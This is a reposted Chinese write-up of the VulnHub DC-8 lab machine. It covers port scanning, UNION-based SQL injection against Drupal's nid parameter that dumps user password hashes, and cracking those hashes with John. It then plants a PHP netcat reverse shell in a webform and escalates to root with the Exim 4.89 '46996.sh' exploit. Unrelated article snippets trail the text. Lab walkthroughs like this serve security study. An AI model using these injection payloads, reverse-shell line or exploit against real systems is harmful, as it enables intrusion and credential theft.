[vulnhub] DC: 8

https://www.vulnhub.com/entry/dc-8,367/

描述:在 Linux 上安装和配置双因素身份验证是否可以防止 Linux 服务器被利用

端口扫描主机发现

  1. 探测存活主机,179是靶机

    nmap -sP 192.168.75.0/24                 
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-03 20:46 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00031s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00024s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.179
    Host is up (0.00027s latency).
    MAC Address: 00:0C:29:15:00:FB (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00033s latency).
    MAC Address: 00:50:56:FE:CA:7A (VMware)
    Nmap scan report for 192.168.75.151
    
  2. 探测主机所有开放端口

    map -sT -min-rate 10000 -p- 192.168.75.179
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-03 20:47 CST
    Nmap scan report for 192.168.75.179
    Host is up (0.00096s latency).
    Not shown: 65533 closed tcp ports (conn-refused)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    MAC Address: 00:0C:29:15:00:FB (VMware)
    
  3. 探测服务版本以及系统版本

    nmap -sV -sT -O -p 80,22 192.168.75.179    
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-03 20:47 CST
    Nmap scan report for 192.168.75.179
    Host is up (0.00048s latency).PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
    80/tcp open  http    Apache httpd
    MAC Address: 00:0C:29:15:00:FB (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
  4. 扫描漏洞

    nmap -script=vuln -p 80,22 192.168.75.179
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-03 20:48 CST
    Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
    NSE Timing: About 0.00% done
    Nmap scan report for 192.168.75.179
    Host is up (0.00055s latency).PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    | http-csrf: 
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.179
    |   Found the following possible CSRF vulnerabilities: 
    |     
    |     Path: http://192.168.75.179:80/node/3
    |     Form id: webform-client-form-3
    |_    Form action: /node/3
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-enum: 
    |   /rss.xml: RSS or Atom feed
    |   /robots.txt: Robots file
    |   /UPGRADE.txt: Drupal file
    |   /INSTALL.txt: Drupal file
    |   /INSTALL.mysql.txt: Drupal file
    |   /INSTALL.pgsql.txt: Drupal file
    |   /CHANGELOG.txt: Drupal v1
    |   /: Drupal version 7 
    |   /README.txt: Interesting, a readme.
    |   /0/: Potentially interesting folder
    |_  /user/: Potentially interesting folder
    MAC Address: 00:0C:29:15:00:FB (VMware)
    

web渗透

  1. 访问主页这次依旧是Drupal ,织纹识别显示版本是Drupal 7

    在这里插入图片描述

    文中内容是

    
    Very Important MessageThere will be disruptions to this site over the next few weeks while we resolve a few outstanding issues.We apologise for any inconvenience.
    

    Contact Us存在表单,填完后输出:Thanks for taking the time to contact us. We shall be in contact soon. 好像也没啥用

  2. 扫描目录看看,没什么实质性的东西

    dirsearch -u 192.168.75.179 -x 403,404
    //
    [20:49:49] Starting:                                                                                                                                                                                             
    [20:50:35] 200 -   33KB - /CHANGELOG.txt                                    
    [20:50:37] 200 -  769B  - /COPYRIGHT.txt                                    
    [20:50:53] 301 -  239B  - /includes  ->  http://192.168.75.179/includes/    
    [20:50:54] 200 -  868B  - /INSTALL.mysql.txt                                
    [20:50:54] 200 -    1KB - /install.php                                      
    [20:50:54] 200 -  842B  - /INSTALL.pgsql.txt                                
    [20:50:54] 200 -    1KB - /install.php?profile=default                      
    [20:50:55] 200 -    6KB - /INSTALL.txt                                      
    [20:50:59] 200 -    7KB - /LICENSE.txt                                      
    [20:51:02] 200 -    2KB - /MAINTAINERS.txt                                  
    [20:51:05] 301 -  235B  - /misc  ->  http://192.168.75.179/misc/            
    [20:51:05] 301 -  238B  - /modules  ->  http://192.168.75.179/modules/      
    [20:51:08] 200 -    2KB - /node                                             
    [20:51:18] 301 -  239B  - /profiles  ->  http://192.168.75.179/profiles/    
    [20:51:20] 200 -    2KB - /README.txt                                       
    [20:51:21] 200 -  744B  - /robots.txt                                       
    [20:51:22] 301 -  238B  - /scripts  ->  http://192.168.75.179/scripts/      
    [20:51:26] 301 -  236B  - /sites  ->  http://192.168.75.179/sites/          
    [20:51:26] 200 -  129B  - /sites/all/libraries/README.txt                   
    [20:51:26] 200 -    0B  - /sites/example.sites.php                          
    [20:51:26] 200 -  545B  - /sites/all/themes/README.txt                      
    [20:51:27] 200 -  715B  - /sites/all/modules/README.txt                     
    [20:51:27] 200 -  431B  - /sites/README.txt                                 
    [20:51:34] 301 -  237B  - /themes  ->  http://192.168.75.179/themes/        
    [20:51:37] 200 -    3KB - /UPGRADE.txt                                      
    [20:51:37] 200 -    2KB - /user                                             
    [20:51:37] 200 -    2KB - /user/                                            
    [20:51:38] 200 -    2KB - /user/login/                                      
    [20:51:40] 200 -  177B  - /views/ajax/autocomplete/user/a                   
    [20:51:42] 200 -    2KB - /web.config                                       
    [20:51:46] 200 -   42B  - /xmlrpc.php                                              
    
  3. 当我们点击左边Details栏位的链接的URL是/?nid=1 可能存在SQL注入

    • 输入1' ,惊喜的发现报错了

      # http://192.168.75.179/?nid=1'
      

      在这里插入图片描述

      爆出了SQL语句 : SELECT title FROM node WHERE nid = 1

    • 继续深入注入(尝试手工注入)

      # 显示位
      /?nid=0 union select 1
      # 用户,dbuser@localhost
      /?nid=0 union select user()
      # 当前数据库,d7db
      /?nid=0 union select database()
      # 版本,10.1.26-MariaDB-0+deb9u1
      /?nid=0 union select version()
      
    • 表中的数据库

      /?nid=0 union select group_concat(table_name) from information_schema.tables where table_schema = database()
      
      actions,authmap,batch,block,block_custom,block_node_type,block_role,blocked_ips,
      cache,cache_block,cache_bootstrap,cache_field,cache_filter,cache_form,cache_image,
      cache_menu,cache_page,cache_path,cache_views,cache_views_data,ckeditor_input_format,
      ckeditor_settings,ctools_css_cache,ctools_object_cache,date_format_locale,
      date_format_type,date_formats,field_config,field_config_instance,field_data_body,
      field_data_field_image,field_data_field_tags,field_revision_body,field_revision_field_image,
      field_revision_field_tags,file_managed,file_usage,filter,filter_format,flood,history,
      image_effects,image_styles,menu_custom,menu_links,menu_router,node,node_access,
      node_revision,node_type,queue,rdf_mapping,registry,registry_file,role,role_permission,
      search_dataset,search_index,search_node_links,search_total,semaphore,sequences,
      sessions,shortcut_set,shortcut_set_users,site_messages_table,system,taxonomy_index,
      taxonomy_term_data,taxonomy_term_hierarchy,taxonomy_vocabulary,url_alias,users,
      users_roles,variable,views_display,views
      

      我们感兴趣的只有users

    • users表的列

      /?nid=0 union select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users'
      

      仅需要namepass

      uid,name,pass,mail,theme,signature,signature_format,created,access,login,status,timezone,language,picture,init,data
      
    • users表的数据

      /?nid=0 union select group_concat('~',name,':',pass,'~') from users
      
      ~:~,
      ~admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z~,
      ~john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF~
      

      users表的所有数据

      +-----+---------------------+-----------------------+---------------------------------------------------------+------------+---------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------+------------+------------+---------+----------+--------------------+-----------+------------+------------------+
      | uid | init                | mail                  | pass                                                    | login      | theme   | data                                                                                                                                                                        | name    | access     | created    | picture | status   | timezone           | signature | language   | signature_format |
      +-----+---------------------+-----------------------+---------------------------------------------------------+------------+---------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------+------------+------------+---------+----------+--------------------+-----------+------------+------------------+
      | 0   | <blank>             | <blank>               | <blank>                                                 | 0          | <blank> | NULL                                                                                                                                                                        | <blank> | 0          | 0          | 0       | 0        | NULL               | <blank>   | <blank>    | NULL             |
      | 1   | dc8blah@dc8blah.org | dcau-user@outlook.com | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z | 1567766626 | <blank> | a:2:{s:7:"contact";i:0;s:7:"overlay";i:1;}                                                                                                                                  | admin   | 1567766818 | 1567489015 | 0       | 1        | Australia/Brisbane | <blank>   | <blank>    | filtered_html    |
      | 2   | john@blahsdfsfd.org | john@blahsdfsfd.org   | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF | 1567497783 | <blank> | a:5:{s:16:"ckeditor_default";s:1:"t";s:20:"ckeditor_show_toggle";s:1:"t";s:14:"ckeditor_width";s:4:"100%";s:13:"ckeditor_lang";s:2:"en";s:18:"ckeditor_auto_lang";s:1:"t";} | john    | 1567498512 | 1567489250 | 0       | 1        | Australia/Brisbane | <blank>   | <blank>    | filtered_html    |
      +-----+---------------------+-----------------------+---------------------------------------------------------+------------+---------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------+------------+------------+---------+----------+--------------------+-----------+------------+------------------+
      
  4. 随即将密码放到john爆破,密码存在pass文件里

    # john pass 
    Using default input encoding: UTF-8
    Loaded 2 password hashes with 2 different salts (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
    Cost 1 (iteration count) is 32768 for all loaded hashes
    Will run 8 OpenMP threads
    Proceeding with single, rules:Single
    Press 'q' or Ctrl-C to abort, almost any other key for status
    Almost done: Processing the remaining buffered candidate passwords, if any.
    Proceeding with wordlist:/usr/share/john/password.lst
    turtle           (?)     
    

    一段时间后爆破出turtle ,去尝试登陆后台

  5. 最后用户john使用密码turtle 进入了后台

利用后台

  1. 进入后台我们直接添加内容输入一句话木马尝试,发现代码没有解析,继续寻找可利用点

    在这里插入图片描述

  2. My account 里面可以上传头像,想着有没有存在包含漏洞,很可惜图片保存后是绝对路径

  3. Content里面选择Contact Us 然后edit ,如图存在疑似可以插入PHP代码的地方

    在这里插入图片描述

    可以看到内容是我们填完Contact Us 的表单后出现的字符,我们尝试它修改为反弹shell代码

    <?php system('nc 192.168.75.151 1234 -e /bin/bash'); ?>
    

    注意Text Fotmat 修改为PHP code ,同时kali开启监听

    nc -lvp 1234                          
    listening on [any] 1234 ...
    

    填写表单(随便输点东西),提交,网页一直加载(有说法),返回kali看,反弹shell成功

提权

  1. 查看权限

    $ whoami
    www-data
    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    $ uname -a
    Linux dc-8 4.9.0-4-amd64 #1 SMP Debian 4.9.51-1 (2017-09-28) x86_64 GNU/Linux
    
  2. 寻找提权的点

    • SUID

      $ find / -perm -u=s -type f 2>/dev/null
      //
      /usr/bin/chfn
      /usr/bin/gpasswd
      /usr/bin/chsh
      /usr/bin/passwd
      /usr/bin/sudo
      /usr/bin/newgrp
      /usr/sbin/exim4
      /usr/lib/openssh/ssh-keysign
      /usr/lib/eject/dmcrypt-get-device
      /usr/lib/dbus-1.0/dbus-daemon-launch-helper
      /bin/ping
      /bin/su
      /bin/umount
      /bin/mount
      

      看到exim4 ,尝试提权

  3. 尝试exim4提权

    • 查看版本,4.89

      $ exim4 --version
      //
      Exim version 4.89 #2 built 14-Jun-2017 05:03:07
      Copyright (c) University of Cambridge, 1995 - 2017
      (c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
      Berkeley DB: Berkeley DB 5.3.28: (September  9, 2013)
      Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open
      Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
      Authenticators: cram_md5 plaintext
      Routers: accept dnslookup ipliteral manualroute queryprogram redirect
      Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
      Fixed never_users: 0
      Configure owner: 0:0
      Size of off_t: 8
      Configuration file is /var/lib/exim4/config.autogenerated
      
    • 搜索漏洞

      searchsploit Exim     
      --------------------------------------------------------------------------- ---------------------------------Exploit Title                                                             |  Path
      --------------------------------------------------------------------------- ---------------------------------
      Dovecot with Exim - 'sender_address' Remote Command Execution              | linux/remote/25297.txt
      Exim - 'GHOST' glibc gethostbyname Buffer Overflow (Metasploit)            | linux/remote/36421.rb
      Exim - 'perl_startup' Local Privilege Escalation (Metasploit)              | linux/local/39702.rb
      Exim - 'sender_address' Remote Code Execution                              | linux/remote/25970.py
      Exim 3.x - Format String                                                   | linux/local/20900.txt
      Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation              | linux/local/40054.c
      Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow                      | linux/local/756.c
      Exim 4.41 - 'dns_build_reverse' Local Read Emails                          | linux/local/1009.c
      Exim 4.42 - Local Privilege Escalation                                     | linux/local/796.sh
      Exim 4.43 - 'auth_spa_server()' Remote                                     | linux/remote/812.c
      Exim 4.63 - Remote Command Execution                                       | linux/remote/15725.pl
      Exim 4.84-3 - Local Privilege Escalation                                   | linux/local/39535.sh
      Exim 4.87 - 4.91 - Local Privilege Escalation                              | linux/local/46996.sh
      Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)                 | linux/local/47307.rb
      Exim 4.87 < 4.91 - (Local / Remote) Command Execution                      | linux/remote/46974.txt
      Exim 4.89 - 'BDAT' Denial of Service                                       | multiple/dos/43184.txt
      exim 4.90 - Remote Code Execution                                          | linux/remote/45671.py
      Exim < 4.86.2 - Local Privilege Escalation                                 | linux/local/39549.txt
      Exim < 4.90.1 - 'base64d' Remote Code Execution                            | linux/remote/44571.py
      Exim Buffer 1.6.2/1.6.51 - Local Overflow                                  | unix/local/20333.c
      Exim ESMTP 4.80 - glibc gethostbyname Denial of Service                    | linux/dos/35951.py
      Exim Internet Mailer 3.35/3.36/4.10 - Format String                        | linux/local/22066.c
      Exim Sender 3.35 - Verification Remote Stack Buffer Overrun                | linux/remote/24093.c
      Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit)    | linux/remote/16925.rb
      PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution                   | php/webapps/42221.py
      --------------------------------------------------------------------------- ---------------------------------
      

      可以看到 46996.sh 是比较合适的,我们将它拉取下来,然后下载到靶机

    • 查看脚本内容,看食用方法

      # Usage (netcat method):
      # $ id
      # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
      # $ ./raptor_exim_wiz -m netcat
      
    • 将文件放到/tmp目录下,给予文件执行权限

      cd /tmp
      wget 192.168.75.151/46996.sh
      chmod u+x 46996.sh
      

      根据食用方法执行文件

      ./46996.sh -m netcat
      
    • 提权成功

      whoami
      root
      
    • 读取flag内容

      # cat flag.txt
      //
      Brilliant - you have succeeded!!!888       888          888 888      8888888b.                             888 888 888 888
      888   o   888          888 888      888  "Y88b                            888 888 888 888
      888  d8b  888          888 888      888    888                            888 888 888 888
      888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
      888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888
      88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
      8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "
      888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888Hope you enjoyed DC-8.  Just wanted to send a big thanks out there to all those
      who have provided feedback, and all those who have taken the time to complete these little
      challenges.I'm also sending out an especially big thanks to:@4nqr34z
      @D4mianWayne
      @0xmzfr
      @theart42This challenge was largely based on two things:1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
      2. A suggestion from @theart42The answer to that question is...If you enjoyed this CTF, send me a tweet via @DCAU7.

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/884572.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

自扶正救生艇,保障水上救援的安全卫士_鼎跃安全

在应急事件中&#xff0c;自扶正救生艇能够发挥关键的救援和保障作用&#xff0c;确保救援人员和被困人员的生命安全&#xff0c;尤其在极端天气或突发水上事故中展现出明显优势。 在救援过程中如果遭遇翻船&#xff0c;救生艇能够迅速恢复正常姿态&#xff0c;确保救援人员不会…

提升网站安全性 HTTPS的重要性与应用指南

内容概要 在如今数字化快速发展的时代&#xff0c;网站安全显得尤为重要。许多用户在访问网站时&#xff0c;尤其是涉及个人信息或金融交易时&#xff0c;对数据传输的安全性有着高度的关注。HTTPS&#xff08;超文本传输安全协议&#xff09;正是为了满足这种需求而诞生的。通…

QT——自定义控件绘图

一.QPaintEvent绘图事件 QPaintEvent是QT中一个重要的类&#xff0c;专门用于绘图事件。当QT视图组件需要重绘制自己的一部分时&#xff0c;就会产生该事件&#xff0c;通常发生在以下几种情况。 窗口第一次显示时&#xff1a;当窗口或控件第一次出现在屏幕中&#xff0c;系统…

【Python · Pytorch】人工神经网络 ANN(上)

【Python Pytorch】人工神经网络 ANN&#xff08;上&#xff09; 0. 生物神经网络1. 人工神经网络定义2. 人工神经网络结构2.1 感知机2.2 多层感知机2.3 全连接神经网络2.4 深度神经网络 2. 训练流程※ 数据预处理 (Data Preprocessing) 3. 常见激活函数3.1 Sigmoid / Logisti…

【Redis_Day2】在Linux中安装Redis5

本篇涉及Linux中的三条指令&#xff1a;su&#xff1b;apt&#xff1b;vim&#xff0c;可以了解后再来浏览本篇。或在评论留言。 【Redis_Day2】在Linux中安装Redis5 安装修改配置文件使用redis-cli连接服务器 安装 Linux版本选择Ubuntu22.04 Redis版本选择Redis5 登录Ubunt…

第1篇 引言

一、AIGC概念 1、AIGC定义 AIGC&#xff0c;即生成式人工智能&#xff08;Artificial Intelligence Generated Content&#xff09;&#xff0c;是指利用人工智能技术自动生成或辅助创作内容的过程和结果。 简单来说&#xff1a;过去&#xff0c;写文章、画张图、唱首歌、弄个…

深度学习---------------------------------Transformer

目录 Transformer架构多头注意力有掩码的多头注意力基于位置的前馈网络层归一化信息传递预测总结代码多头注意力使用多个头并行计算选择缩放点积注意力作为每一个注意力头测试该部分总代码Transformer基于位置的前馈网络改变张量的最里层维度的尺寸对比不同维度的层归一化和批量…

世界时区划分

1. AoE &#xff08;Anywhere on Earth&#xff09;代表地球上最后一个时区的时间&#xff0c;是全球范围内最晚的时间&#xff0c;通常用于截止日期。 2. UTC/GMT &#xff08;协调世界时/格林威治时间&#xff09;是全球的标准时间&#xff0c;所有时区都是基于UTC计算的。…

qt QImage详解

1、概述 QImage是Qt框架中用于处理图像数据的一个核心类。与QPixmap不同&#xff0c;QImage是在内存中直接存储图像像素数据的&#xff0c;这使得它适用于需要直接访问和修改像素的应用场景&#xff0c;比如图像处理算法、图像绘制以及图像分析等。QImage支持多种图像格式&…

DAY75WEB 攻防-验证码安全篇接口滥用识别插件复用绕过宏命令填入滑块类

知识点&#xff1a; 1、验证码简单机制-验证码过于简单可爆破 2、验证码重复使用-验证码验证机制可绕过 3、验证码智能识别-验证码图形码被可识别 4、验证码接口调用-验证码触发接口可枚举 图片验证码-识别插件-登录爆破&接口枚举 验证码识别绕过等技术适用于&#x…

字符串左旋 (干货无废话)

题目内容&#xff1a;实现一个函数&#xff0c;可以左旋字符串中的k个字符 例如&#xff1a;ABCD左旋一个字符得到BCDA ABCD左旋两个字符得到CDAB 画图解释&#xff1a; 上图分别是向左挪1次&#xff0c;2次&#xff0c;3次&#xff0c;4次&#xff0c;5次后的结果…

QML基础语法2

函数 函数格式&#xff1a; function关键字 函数名(参数名1:参数类型,参数名2:参数类型,...):返回值类型{} 其中&#xff1a; 函数名必须以小写字符开头&#xff0c;后面驼峰可以有多个参数或者没有参数参数类型可以不写返回值类型也可以不写 如何调用&#xff1a;通过id点…

Mac 配置SourceTree集成云效

1、背景 工作使用的是自己的笔记本&#xff0c;一个是比较卡&#xff0c;在一个是敏感信息比较多还是使用公司的电脑&#xff0c;但是系统是Mac就很麻烦&#xff0c;在网上找了帖子记录一下 2、配置 打开终端 ssh-keygen -t rsa #一直回车就行 cd .ssh cat id_rsa.pub #查…

Kubernetes中常见的volumes数据卷

华子目录 volumesk8s支持的卷的类型emptyDir卷功能emptyDir的使用场景示例 hostPath卷功能用法安全隐患示例 nfs卷功能应用示例&#xff1a;部署一台nfs服务器并在所有k8s节点中安装nfs-utils volumes 容器中文件在磁盘上是临时存放的&#xff0c;这给容器中运行的特殊应用程序…

PaddleNLP的FAQ问答机器人

项目源码获取方式见文章末尾&#xff01; 600多个深度学习项目资料&#xff0c;快来加入社群一起学习吧。 《------往期经典推荐------》 项目名称 1.【DDRNet模型创新实现人像分割】 2.【卫星图像道路检测DeepLabV3Plus模型】 3.【GAN模型实现二次元头像生成】 4.【CNN模型实…

Windows的MySQL开机自动启动问题

标题 问题描述 问题描述 在Windows系统中&#xff0c;我设置好了MySQL服务为自动启动&#xff0c;但在开机后发现MySQL服务任没有自动运行。我有点苦恼&#xff0c;每次连接MySQL&#xff0c;都要进入计算机管理&#xff0c;手动打开。 解决方法&#xff1a; 1.前提安装好MySQ…

基于Spring Boot的私房菜定制上门服务系统的设计与实现

摘 要 如今社会上各行各业&#xff0c;都喜欢用自己行业的专属软件工作&#xff0c;互联网发展到这个时候&#xff0c;人们已经发现离不开了互联网。新技术的产生&#xff0c;往往能解决一些老技术的弊端问题。因为传统私房菜定制上门服务系统信息管理难度大&#xff0c;容错率…

计算机毕业设计 | 基于SpringBoot的健身房管理系统(附源码)

1&#xff0c;项目背景 随着人们生活水平的提高和健康意识的增强&#xff0c;健身行业逐渐兴起并迅速发展。而现代化的健身房管理系统已经成为健身房发展的必备工具之一。传统的健身房管理方式已经无法满足现代化健身房的需求&#xff0c;需要一种更加高效、智能、安全的管理系…

LeetCode 0685.冗余连接 II:并查集(和I有何不同分析)——详细题解(附图)

【LetMeFly】685.冗余连接 II&#xff1a;并查集&#xff08;和I有何不同分析&#xff09;——详细题解(附图) 力扣题目链接&#xff1a;https://leetcode.cn/problems/redundant-connection-ii/ 在本问题中&#xff0c;有根树指满足以下条件的 有向 图。该树只有一个根节点&…

前端请求后端接口报错(blocked:mixed-content),以及解决办法

报错原因&#xff1a;被浏览器拦截了&#xff0c;因为接口地址不是https的。 什么是混合内容&#xff08;Mixed Content&#xff09; 混合内容是指在同一页面中同时包含安全&#xff08;HTTPS&#xff09;和非安全&#xff08;HTTP&#xff09;资源的情况。当浏览器试图加载非…